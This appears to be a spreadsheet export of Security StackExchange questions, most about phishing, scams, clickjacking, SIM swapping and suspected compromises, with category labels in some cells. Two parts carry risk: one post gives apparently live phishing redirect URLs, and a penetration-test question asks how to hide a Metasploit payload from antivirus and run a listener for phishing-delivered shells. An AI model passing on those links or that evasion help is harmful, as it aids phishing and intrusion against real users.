  page URL which would, when executed, display the alert box.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;and other sites talk about very similar examples.&lt;/p&gt;
 &lt;p&gt;The problem is that I cannot find an explanation on HOW the malicious URL/payload is delivered to the user, like how the user can fall victim to this attack since it's a client based attack and requires no server interaction. 
 Is phishing used for DOM XSS as well? &lt;/p&gt;
 &lt;p&gt;And how does the attacker identify a site with a possible DOM based XSS vulnerability?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;web-browser&gt;&lt;xss&gt;&lt;javascript&gt;&lt;vulnerability&gt;</t>
  </si>
  <si>
    <t>The address bar is necessary for protection</t>
  </si>
  <si>
    <t>Is Clickjacking a real security vulnerability?</t>
  </si>
  <si>
    <t>&lt;p&gt;As I understand it, this is how an attacker would exploit clickjacking:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Create a new website malicioussite.com which includes my site in a frame, but overlays malicious input fields or buttons over the HTML elements of my site.&lt;/li&gt;
 &lt;li&gt;Send out phishing emails to get users to click on the link that goes to malicioussite.com rather than my site (or use some other technique to distribute the phishing link).&lt;/li&gt;
 &lt;li&gt;Users enter data into or click on the malicious elements.&lt;/li&gt;
 &lt;li&gt;Profit&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Savvy users would either not click the link, or notice that the address bar is incorrect. However, plenty of people would probably not notice.&lt;/p&gt;
 &lt;p&gt;My question is this: Can't the attacker achieve the same thing by using malicioussite.com as a reverse proxy? All the steps above would be the same, except that malicioussite.com would forward the requests to my site and then insert an extra &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; tag in the HTML response to run the malicious code and add the malicious HTML elements. The &lt;code&gt;X-FRAME-OPTIONS&lt;/code&gt; header wouldn't help in that case because there are no frames (and the reverse proxy can strip it out anyway).&lt;/p&gt;
 &lt;p&gt;The attack relies on the user not checking the address bar, so if the attacker can implement the same attack in a different way that can't be defeated, why bother with &lt;code&gt;X-FRAME-OPTIONS&lt;/code&gt; or other clickjacking protections?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;clickjacking&gt;</t>
  </si>
  <si>
    <t>Can someone use a valid SSL certificatre on a phishing site?</t>
  </si>
  <si>
    <t>What is the risk of someone else having access to your SSL certificate?</t>
  </si>
  <si>
    <t>&lt;p&gt;Over the last couple of years, there were a few instances when some third party managed to create a SSL certificate for a domain that doesn't belong to them, for example google.com, or most recently github.com. &lt;/p&gt;
 &lt;p&gt;In my limited understanding, accessing a signed web site means my browser will compare the domain I'm accessing with the certificate it offers. So, if I somehow manage to get people to my phishing site called &lt;code&gt;g00gle.com&lt;/code&gt; using the &lt;code&gt;google.com&lt;/code&gt; certificate, my browser should complain that the certificate is not valid for this domain.&lt;/p&gt;
 &lt;p&gt;Obviously, I must be missing something here, this wouldn't be all over the news otherwise. What kind of mischief is possible, or likely, using a valid SSL certificate that points to someone else's domain? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;certificate-authority&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Technical invistigating and tracing of phishing and Understanding the attack impact or concequences</t>
  </si>
  <si>
    <t>Hyperlinks</t>
  </si>
  <si>
    <t>What is the purpose of hiding spam links in some obscure forum posts?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm moderating one small Discourse forum and we, like everyone else, get spammers from time to time. Our forum is small, like 40-60 weekly unique visitors. Our forum requires that each new user's first post must be reviewed by a moderator before it appears and this catches most of the spammers.&lt;/p&gt;
 &lt;p&gt;Recently we've been getting spammers posting to some older thread without contributing anything new, like writing: &lt;code&gt;&amp;quot;Thank you. This solved my problem.&amp;quot;&lt;/code&gt; While posts like these are suspicious, a moderator can't block them outright because they aren't against any rules and they might be coming from a legit user who has just created an account in order to thank someone for helping them out.&lt;/p&gt;
 &lt;p&gt;Usually after their first post is published, the spammers come back a day or two later and they either make a new post or they edit their previous post to include &amp;quot;hidden links&amp;quot;, like:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;Thank you[.](https://www.SomeRandomSpamURL.com/) This solved my problem[.](https://www.SomeOtherRandomSpamURL.com/) [.](https://www.EvenMoreRandomSpamURLs.com/))&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;I'm simply curious as to why would someone do this? I understand the purpose of regular spam links where the spammer tries to explicitly divert traffic to some site, but if the link is hidden behind a dot, then 99% of users likely won't ever realize there's a link to be clicked. If they do, then they'll likely realize it's a scam link. It's also not like someone could accidentally hit a dot on a forum post either.&lt;/p&gt;
 &lt;p&gt;What are these spammers trying to gain by creating these &amp;quot;hidden&amp;quot; spam links?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;websites&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>the attack impact on the network</t>
  </si>
  <si>
    <t>Can someone access my computer if someone else on the same network allowed a hacker to remotely access his computer</t>
  </si>
  <si>
    <t>&lt;p&gt;Earlier today, my partner responded to a phishing attempt (I believe) that suggested he call a number to get his computer scanned for viruses. He called the number, and allowed them access to "scan" his computer. He doesn't store anything on his computer. He has no email, no documents, nothing. I was concerned because I don't know whether my wireless network (which my partner and I both use) could allow a hacker into my computer, which DOES have email, passwords, etc. on it. I contacted my ISP provided (AT&amp;amp;T), and they say, unequivocally, that my computer could not have been accessed. I'd like to know if this is true. Thank you.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;router&gt;</t>
  </si>
  <si>
    <t>What attackers can do more?</t>
  </si>
  <si>
    <t>Did I get "hacked"? Need help</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm a little apprehensive that there is some unauthorized usage of my router or computer or phone. I have an Asus RT-AC66U, a macbook pro and an iPhone. I'm hoping someone here might be able to help. &lt;/p&gt;
 &lt;p&gt;I got a phone call from a "no caller id" a couple of weeks ago from some clearly scammers trying to get me to go to fastsupport.com and do something or other, I didn't, but I stayed on the phone with them for 10 minutes leading them on. A week or so later I got an email from Apple saying I needed to change my Apple ID password and security questions so I did, and then I needed to select my device from a list, and there was a device listed called "Neftali Lira's iPhone", definitely not mine but I thought it might have created a randomly generated option to ensure I picked the right device. Another week later I got overage notices from my ISP because I had used about 100gb more than normal this month. Sensing something was afoul I logged into iCloud and realized Neftali Lira's phone was still listed under my devices on find my iphone. I removed the device from my account, reset my phone to factory and restored my computer to a time machine backup from 3 months ago. Changed all my passwords, reset the router, changed its password. The next morning I got a phone call from a "no caller id", no one on the other end, so I hung up. I logged into my router to monitor traffic and noticed that 4.5gb had been downloaded and uploaded when I was not using the internet and the activity stopped the exact minute I got the phone call. Either very coincidental or very suspicious. &lt;/p&gt;
 &lt;p&gt;I did some research at this point, fastsupport.com is clearly a phishing scam, but I never downloaded anything from their website, only talked to them on the phone, I might have visited the website on my phone out of curiosity, I remember what it looks like but I can't remember from which device I looked at it, can they get into my devices from just a phone call or me visiting the site? My router, RT-AC66U has some old firmware that I was using and from what I've read I think was vulnerable, I was running: 3.0.0.4.374., I've just now updated to 3.0.0.4.380 and changed the passwords again. I don't know anything about this type of security stuff, does any of that seem suspect to anyone? Is it possible they got access to my data? Am I safe now? Thanks in advance for any help. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;router&gt;&lt;account-security&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Is it phishing? Human/Manual detection and reporting, Understanding the attack impact or concequences</t>
  </si>
  <si>
    <t>Clicking dangerous link on TOR</t>
  </si>
  <si>
    <t>Is it safe to visit any website in TOR when the Security Bar is set at Maximum? (Safest)</t>
  </si>
  <si>
    <t>&lt;p&gt;Someone has sent me a link on Tor which when visited instantly read that the website itself was not available and that apparently the link is broken somehow. When using Tor i use the option &amp;quot;Safest&amp;quot;&lt;/p&gt;
 &lt;p&gt;But im a little paranoid that i clicked on something which was risky. Am i instantly exposed now to the apparent &amp;quot;hacker&amp;quot; ? Could have also been a wrong copied link but i can't be too sure about that.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;http&gt;&lt;phishing&gt;&lt;tor&gt;&lt;websites&gt;</t>
  </si>
  <si>
    <t>Cyber bullying. threatining the user to use his data</t>
  </si>
  <si>
    <t>Scam caller claimed to have elderly friend's "Windows unique identifier"</t>
  </si>
  <si>
    <t>&lt;p&gt;An elderly friend received a telephone call similar to &lt;a href="https://security.stackexchange.com/questions/67507/suspicious-phone-call-claiming-ms-office-not-updated-lately"&gt;this Information Security SE post&lt;/a&gt; and &lt;a href="https://security.stackexchange.com/questions/4536/a-phone-call-hack"&gt;this one&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;The caller claimed that my friend's computer had a problem that needed to be fixed. My friend was savvy enough to quickly identify this as a scam, and refused to provide any information.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;What set the call apart from those other SE posts was that the caller claimed to know my friend's "Windows unique identifier"&lt;/strong&gt; (or something close to that). Guessing that my friend has a Windows device is not hard: about 90% of computers use some variety of Windows. I'm not sure what the caller meant by "Windows unique identifier", but I'm guessing they were referring to the Windows Product ID.&lt;/p&gt;
 &lt;p&gt;My friend wasn't interested in spending any time on the call or verifying any information, but it sounded like the caller was prepared to provide a unique ID that my friend could verify on her computer.&lt;/p&gt;
 &lt;p&gt;There are many pieces of data that can easily be gleaned about a computer just by visiting a website. To my knowledge, the Windows Product ID is &lt;strong&gt;&lt;em&gt;not&lt;/em&gt;&lt;/strong&gt; one of those pieces of information.&lt;/p&gt;
 &lt;p&gt;The insistence by the caller that she could provide my friend's "Windows unique identifier" is concerning.&lt;/p&gt;
 &lt;p&gt;To keep this question narrow, let's assume that my friend has no malware installed on her system. (I had her perform several thorough scans with different products, and it tested clean on all of them. I also had her use a Linux CD-ROM with several scanners on it, so she could boot from it and perform more scans... everything showed clean. I reviewed her system and firewall logs, and did not find anything abnormal.)&lt;/p&gt;
 &lt;p&gt;Let's also assume the caller was not bluffing, and really did have a verifiable "Windows unique identifier" or Windows Product ID.&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;Questions:&lt;/em&gt; &lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Is there some sort of "Windows unique identifier", perhaps the Windows Product ID, that is transmitted by any common browsers or browser addons/extensions?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Is the Windows Product ID relatively unique, or does every computer manufacturer just use a small number of Windows Product ID's when they pre-install Windows on their systems, thus making it fairly easy to guess?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;If the answer to #1 is "no", and the answer to #2 is that they are relatively unique, and assuming that she has no malware, how could a scammer get a hold of that information?&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Note that, despite my recommendations, she has a subscription to one of Symantec's Norton Antivirus/Security products. Has Symantec had any breaches in which such data could have been stolen? I do insist that she perform frequent scans with other products as well.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;windows&gt;&lt;web-browser&gt;&lt;phishing&gt;&lt;phone&gt;&lt;internet&gt;</t>
  </si>
  <si>
    <t>How attacker can use my stolen information</t>
  </si>
  <si>
    <t>Liliane Bettencourt scam?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got a text message from an &lt;code&gt;Elizabeth.Zamora@Bridgeportct.gov&lt;/code&gt;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;sub; RE: donations!!!&lt;/p&gt;
 &lt;p&gt;&amp;quot;donation was made to you by Mrs. Liliane Betterncourtm, contact her at: lilianebettencour@163.com&amp;quot; for more info.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;when I made contact I got an email saying she had gotten my number from a web journal and felt strongly to write to me, and so on. I printed out all the emails back and forth. I got the wikipedia.org link and a picture of her. She said she had 'Dementia' and did not have a lot of time as the doctors where ordered to take away all electronic equipment. I got a Right to claim form and a power of attorney letter from a law firm. I checked out the bank, which does exist, but I don't know about the contact person. The phone number given is an electronic voice message. I was almost ready to open an offshore account for $2000, as advise by the Credit Foncier but I decided to investigate and found the scam when I put her name in google. It seemed so real, I'm glad I didn't do it. I did send personal information before I realized it may be a scam. So they have my driver's license# and my passport#.&lt;/p&gt;
 &lt;p&gt;What can I do now to protect myself from identity theft?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;identity-theft&gt;</t>
  </si>
  <si>
    <t>Recived phishing emails which content is from sent box</t>
  </si>
  <si>
    <t>Is this a Phishing email a bit more advanced than usual?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email from a friend, but it was not them. It was their name in the sender field but there was a different email address hidden underneath. There was a zip file attachment.&lt;/p&gt;
 &lt;p&gt;But here‚Äôs the bit that I‚Äôm worried about: the body text of the email was an email conversation from a year ago that took place with that friend. I‚Äôm worried that my sent emails have been accessed somehow and will be sent out to the world.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How was the hacker able to get my Instagram tag through Facebook when they weren‚Äôt linked?</t>
  </si>
  <si>
    <t>&lt;p&gt;All of this happened on 18th November 2020&lt;/p&gt;
 &lt;p&gt;A person I know sent me a phishing link of Facebook then Google, I entered my credentials however as soon as I found out that its a phishing link, I turned off my mobile WiFi and switched it off and I changed my Google Password immediately from another device which was my iPad, I didn't change my Facebook password because it didn't have any information of myself at all, but somehow he got to know my Instagram tag which he claimed to have got to know through Facebook but I never linked it, It just had the same email as my Instagram, so the only way he could've got to know my Instagram is if he had my Gmail account.&lt;/p&gt;
 &lt;p&gt;I downloaded the Google Data of my account and checked the login history of my account
 It didn't show any other IP addresses or other devices rather than mine, there were 4 forgot passwords made on my Instagram which I got through the mail but when I checked my Instagram logins there wasn't any other login either (other than my devices and IP addresses) and my Gmail didn't have less secure app access turned on&lt;/p&gt;
 &lt;p&gt;When I booted my Mobile Phone again, the one where I opened the phishing link, I downloaded Bitdefender security and scanned my device and it didn't find any malware. The browser I used was a Hidden Calculator Browser, the guy who phished claimed that he used Social Engineering Toolkit first when he phished for Facebook and it didn't work so he tried phishing Google using HiddenEye and it worked.&lt;/p&gt;
 &lt;p&gt;I did an &lt;code&gt;Nmap&lt;/code&gt; scan on my PC and it found an open port number &lt;code&gt;4445&lt;/code&gt; named &lt;code&gt;upnotifyp&lt;/code&gt; but this was only internal because when I told my friend to scan there was no open port on my IP address and I downloaded Avast WiFi inspector on my PC scanned my WiFi and Router and it said no vulnerabilities detected.&lt;/p&gt;
 &lt;p&gt;I'm having severe anxiety for weeks because my Google Photos had sensitive pics that were supposed to be my eyes only but I don't know whether he logged in or not because there was no IP address or device other than mine in Google Login History but he got to know my Instagram tag when it wasn't linked to Facebook, but he claimed to get it through Facebook, my Facebook and Insta only shared the same email ID and there's no other way he could've got to know my Insta other than having access to my mail, but then again there were no other IP addresses and I can guarantee that this person wasn't using my WiFi, please help me out.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Is it a coincidence that I received phishing emails for PayPal after I made a large deposit?</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently made a very large deposit into a PayPal account. Not long after (a day or two), I have received phishing emails to steal my PayPal information. The deposit came from eToro (I pulled out some investments) and I received an email confirming the amount. I suspect that something saw the email and is now trying to get my funds. Is this a coincidence or a sign that I have an infected device?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;infection-vector&gt;</t>
  </si>
  <si>
    <t>Could a fake tip that my server is compromised be a social engineering attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;A little while ago I got the following email from an unknown party (using an &lt;code&gt;@alum.cs.[redacted].edu&lt;/code&gt; email address):&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;I'm seeing attack traffic from your Linode. Just a friendly heads up that its likely p0wned. A quick google suggests no one else likes the traffic coming from your Linode either.&lt;br&gt;
  &lt;code&gt;&amp;lt;https://www.google.com/search?q=[my Linode's IP]&amp;gt;&lt;/code&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;However I couldn't find any evidence to support this assertion. I checked the resource utilization graphs provided by Linode, as well as my firewall logs, system's process list, active connections, recently modified files, user accounts, and so on, and found absolutely no anomalies. The results from the Google search didn't seem to back up the claim that nobody else likes the traffic either; nothing I saw in the first few results raised any red flags. So either the server is fine, or I'm dealing with an adversary who knows how to cover their tracks so well that I can't imagine why they would have any interest in my Linode. (There is no sensitive data on it.)&lt;/p&gt;
 &lt;p&gt;This leads me to wonder whether the message could have been a form of phishing. In this particular case, I doubt it, but could something like this be a legitimate social engineering tactic? Is there something I would be likely to reveal by replying to this message which could be used against me in some way I can't think of?&lt;/p&gt;
 &lt;p&gt;If and when this happens in the future, my goal is to respond in a way that allows me to collect the information I need to track down the attack in case it is real, while not revealing anything too compromising in case it isn't real.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;server&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>user4610</t>
  </si>
  <si>
    <t>Exploit circulating Facebook with a .pnh file embedded in a &lt;img&gt; tag</t>
  </si>
  <si>
    <t>&lt;p&gt;Not sure how long this link will be up, but this is the page where users get redirected after trying to read a fake news post in someone timeline.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;[WARNING: ACCESS IN A CONTROLLED ENVIRONMENT]&lt;/strong&gt; &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://yt-news.info/s/?id=qlktvqt46220jr8q6
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Here's the link bait as a news on facebook &lt;code&gt;https://facebook.com/290091591171980&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;What's happening? .pnh files seems to be related with Adobe. And in this case it seems like a visit counter. Not sure if it offers any harm. However, following the the url facebook offers did triggers some anti-virus softwares.&lt;/p&gt;
 &lt;p&gt;Is this a XSS attack? Or just a simple redirect with this unknown .pnh?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;This extension interfaces with &lt;a href="http://whos.amung.us" rel="nofollow"&gt;http://whos.amung.us&lt;/a&gt;. If you use their
  widget on your website, the extension gets how many users are on your
  website and puts the count in your status bar. To configure this after
  it has been installed, open up the addons list from the Firefox menu,
  click on this addon, click options, and enter your 8-12 character key
  which is found in the html you were given. Ie: the image name, without
  the '.png' part, it's pretty self explanatory. Close options, and soon
  thereafter your user count will be updated in real time :)&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/whosamungus-users-online-count/" rel="nofollow"&gt;https://addons.mozilla.org/en-US/firefox/addon/whosamungus-users-online-count/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It seems like it's a phishing attempt:&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://viewtubes.info/bebadas/chrome.html" rel="nofollow"&gt;http://viewtubes.info/bebadas/chrome.html&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;exploit&gt;&lt;html&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>PayPal Scam Email?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is this a scam email or is it a valid email from PayPal?&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;To:¬†XXXXXX XXXXXX From: PayPal Credit Request attempted on:¬†June 10,
  2017&lt;/p&gt;
  &lt;p&gt;You attempted to open an account or make a purchase using the PayPal
  Credit payment method on June 10, 2017. We regret that you were unable
  to use PayPal Credit at that time. As a convenience, we are providing
  you with immediate access to view the reasons why your request was not
  authorized. By clicking on the secure link below, you can begin the
  process of viewing this important information.&lt;/p&gt;
  &lt;p&gt;View Important Information About Your Request When you applied, you
  provided certain information about yourself that we will request for
  verification when you click the link above. After clicking the secure
  link above, a screen will appear requiring you to enter this
  information for verification purposes.¬†&lt;/p&gt;
  &lt;p&gt;You will have access to this information for up to 180 days from the
  date of this email using the link in this e-mail. If you wish to
  continue to have access to this information, you must keep this email,
  and use the above link to access this information in the future.&lt;/p&gt;
  &lt;p&gt;Please do not reply to this email. If you are unable to access this
  information, you will receive a letter within 30 days.&lt;/p&gt;
  &lt;p&gt;Sincerely,&lt;/p&gt;
  &lt;p&gt;PayPal Credit¬†&lt;/p&gt;
  &lt;p&gt;The lender for PayPal Credit accounts is Comenity Capital Bank&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The link points to &lt;a href="https://bml.applications.billmelater.com" rel="nofollow noreferrer"&gt;https://bml.applications.billmelater.com&lt;/a&gt; and they want me to put in my birth date and last 4 digits of my SSN. The sender is supposedly from &lt;code&gt;customercare@paypal.com&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;Here is the provided message header:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;customercare@paypal.com&amp;gt; Received: from
 mx0.slc.paypal.com ([173.0.84.225]) by mx.perfora.net (mxeueus001
 [74.208.5.21]) with ESMTPS (Nemesis) id 0MTydT-1dCYnS2MwD-00Qg0p for
 &amp;lt;XXXXXX@XXXXXXXXXXXX.XX&amp;gt;; Fri, 16 Jun 2017 07:31:00 +0200
 DKIM-Signature: v=1; a=rsa-sha256; d=paypal.com; s=pp-dkim1;
 c=relaxed/relaxed; q=dns/txt; i=@paypal.com; t=1497591058;
 h=From:From:Subject:Date:To:MIME-Version:Content-Type;
 bh=1QULyOBdV2fQFWq+fY0tQ1diErpOz89Nr0ZW8Q/t9O8=;
 b=0yzdRiM1B55ey8LoOBH0iXb3E5yqxdVk1dhjwi9YZem6zKAM8yP6hPvvl9l5Y/EJ
 f93DxSsnM5VTd4EQb803oFL05utxp9GmAXiYeAbba+MRVxl/OTGWThQDk1s7SDJQ
 DXX9SCHzYzeVZ/5dijQj0aaCrPw7+9Sw0Vm4yn1B0VysSWcnHGJWwbTC9E7NBaFr
 A33cVi3lE1uNVJwz8ypxq6RRjMhWYA5Nmhn0RJfE6v8BbRj8HvMKCO4UUrUg/OIb
 e+GiqjR5w3gUsvbEuVBF8IlVFzGEeWE+QTuPzkQQPrWwlQ+Pv59dte7O0sZwT682
 SJdx1RRSxXOg8mF9mHNhsA==; Received: (qmail 11576 invoked by uid 993);
 16 Jun 2017 05:30:58 -0000 Date: Thu, 15 Jun 2017 22:30:58 -0700
 Message-Id: &amp;lt;1497591058.11576@paypal.com&amp;gt; AMQ-Delivery-Message-Id:
 EMAILDELIVERY-Notification_EmailDeliveryEvent-185-1497591052064-3809733053
 X-PP-REQUESTED-TIME: 1497591050550 X-PP-Email-transmission-Id:
 f642bda6-5254-11e7-bd77-5cb90192ccbc PP-Correlation-Id:
 ddc61267a22a1bb0 Subject:
 =?UTF-8?Q?Request_attempted_on=3A=C2=A0June_10=2C_2017?= X-MaxCode-Template: PPC001143 To: &amp;lt;XXXXXX@XXXXXXXXXXXX.XX&amp;gt; From:
 PayPal Credit &amp;lt;customercare@paypal.com&amp;gt; X-Email-Type-Id: PPC001143
 Content-Transfer-Encoding: base64 Content-Type: text/html;
 charset=UTF-8 MIME-Version: 1.0 Envelope-To: &amp;lt;XXXXXX@XXXXXXXXXXXX.XX&amp;gt;
 X-UI-Filterresults:
 notjunk:1;V01:K0:LdGxQFRpRdo=:36HTTy+jN84T1PARbUXaam6TaP 
 /vZtms/sJ5AC2EAGL34ilyA8HGVtQHGuD5/MNyrXPgjCBpMgyCf5HXT0oo5T/94SpRqgh+aHZ
 PbAK2JatMnw40up2972ATAveQN4ejppluCgm3tglysTaDhCc+oDjbj5+RoLSdGYL3EpL9ZxnH
 NaTkIj9JhebaViiAzA1S89Ea4LxXK43tWjyc9GOVWMh55DI8K69/mQW6dCAjnRKk8MGP6iATN
 hHYgWOSEMbJy5HPmwSD5ZwC0SIziTpk+TLftmUGRuDIsXNqUKMynyN+W0eljz6zV2rswrCggJ
 GdSynaaVXzQ0WrhPjc4uc39PyX3UlrH0SM7cbGbaMfCgQGz3EJHaVkBlomVUgauBUPgDRB4qY
 ZN4JNLCxCDciRxWP3p0MtQ95TK8JDfSF9UYBbkPmEjcbgTqFTYYRAtenlyz2HMTRQW6CMyNDD
 AxAZndGz5Jo47ZXivbebQnQTOczSTFG/QrO3yY5PJZfLR5MJcDqHqMca0mzO/8PHErOU0H6J1
 CNZ9oVDMp76Z3ZMlnwKBr6npVoUEp1qZ8YCeZ5SA657pA+dSM1/JTfFkq7GqkrtRUscQd4V4o
 5MmWoPIG0PUYd8DnA5GsoPn4OQd20zk2naYCRKdhr01PWJ7AkrERSJyZGh/9lgg5Kg/u+vxYn
 i4oqqi0PEVzfOz/IQvj7l2I0R1ibJKbjGcDZDheLCXwQXzt8fTUQZDD4MLBsNyY+e5lQQcgaZ
 RxnT9QI62oXk9pqvlxknzOmLCcA2Xlwimr6WUNcRc6Joh/wgXQUBJRpl3YdOwQ/UDPDhlskag
 H5Qls8E1GUcEy6114jBLZsRmexGsklw7qA+UEvRcajBRktYjPewN7YkQVQlp9vhDpSjVf2gtD
 WA5lOh0YlkBOxDrv0m1g5iKvpEZRO7IntT0p9kA5bevZtgWHvBQaa+IGDA1F+Ot4ldT2EEVjs
 EkKGGhK4JNwdZCaTwmqgyPzDJt3I6wnVdeZIzR77XtDXjv+maDNZ9M4xVNwOW0/puP4rGAXHM
 82SGxdPLv/mnEgLe3zTY1sF8D9eU0Bqtvcv9GYcScoz1n2yObr8P4PJ/SqfQJ0vFvT52qxLxG
 1/yQa0OLG1UJlqywAqlWAoNmy8DQYZcrXxebyaN+zslBVh/b9iH+tMc3PVcal+0yiET0DOA1g
 IVa/ECYMR8PmIywvSZvQBnAdR8OgGAigSIrItxkj6rPxvkfSoeRgwWTmSmD5PzYPxbAWIpQ0f
 khmztigydZcMKglCWABd7iXHmmJSrkIW2sXH1G0fIoJ9PVV6nVzOV6fLUNjy5F15m7zoYFDBV
 FiJ3896cAvR+sr69vHk+ivbAWg==
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;email-spoofing&gt;&lt;scam&gt;&lt;paypal&gt;</t>
  </si>
  <si>
    <t>How to protect against SIM swap scammers?</t>
  </si>
  <si>
    <t>&lt;p&gt;SIM swap occurs where the scammer uses phished information about you to request a SIM card replacement from your cell phone carrier, by tricking them into believing that it is you who is making the request for a SIM card replacement by passing their security questions on the phone based on the biometric data they phished about you.&lt;/p&gt;
 &lt;p&gt;Once they have that duplicate of your SIM card, they can receive access codes to your banking and cryptocurrency accounts, because all of this is linked to your phone number (the SIM card).&lt;/p&gt;
 &lt;p&gt;How can anyone possibly protect themselves against this sort of attack? Rarely does anyone have a second phone number, so whatever account you based on your sole number, means they instantly have backdoor access (by fooling your service providers using phished information about you, orally over the phone and by online forms)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;simcard&gt;&lt;swap&gt;</t>
  </si>
  <si>
    <t>What are the possible ways to exploit a login page?</t>
  </si>
  <si>
    <t>&lt;p&gt;In a recent interview I was asked how can you bypass a login page, all it has is Username, password and login button. &lt;/p&gt;
 &lt;p&gt;I was able to come up with below possible ways,&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;SQL Injection&lt;/li&gt;
 &lt;li&gt;Phishing &lt;/li&gt;
 &lt;li&gt;Stealing cookie&lt;/li&gt;
 &lt;li&gt;Trying default / easy to guess usernames and passwords&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;However, the interviewer wasn't satisfied by my answer and was expecting harder ways instead of these easier options. &lt;/p&gt;
 &lt;p&gt;So I wanted to know how else can a login page be exploited? What exploits am I missing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;sql-injection&gt;&lt;cookies&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Penetration testing of windows ( Corporate systems )</t>
  </si>
  <si>
    <t>&lt;p&gt;So I am part of the team where in we have to conduct a penetration testing assignment for our client. Basically what he wants from us is to show how we can get into their system with the help of phishing, and for the POC he wants us to show the listener which we set up.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;My understanding here is to create an exploit with metasploit -&gt; set up the listener -&gt; send the exploit to users -&gt; make them click the attachment = Boom, we get the shell.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Idea wise this is correct but I am stuck at the execution.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;How do I encode my exploit so that I doesn't get detected by the AV. here I have tried the obvious .exe approach which gets detected and deleted immediately. similarly I tried binding it with a pdf which also got detected by the AV.&lt;/li&gt;
 &lt;li&gt;Secondly I am using dynamic IP. In-order to to get it working I tried no-ip which has changed to now-dns and created a host name against my ip. I am not clear to what do I do next, I entered the host name in the listener ip, but how will I get the shell or the listener.&lt;/li&gt;
 &lt;li&gt;Suggestions for the ideal exploit in this scenario - are there any other approaches that I can consider in this case which could help in getting the desired result.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Feel free to correct me if I am wrong at anyplace. I am new in this area so could have missed few things.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;windows&gt;&lt;penetration-test&gt;&lt;metasploit&gt;&lt;meterpreter&gt;</t>
  </si>
  <si>
    <t>Did I just get DNS Hijacked?</t>
  </si>
  <si>
    <t>&lt;p&gt;I went online on my Macbook today and noticed my iTunes complaining that it couldn't connect to Apple, I tried logging out and in of my account but weirdly it said it couldn't log in; I didn't think much of it at first as I thought maybe it was iTunes just being more buggy than usual.&lt;/p&gt;
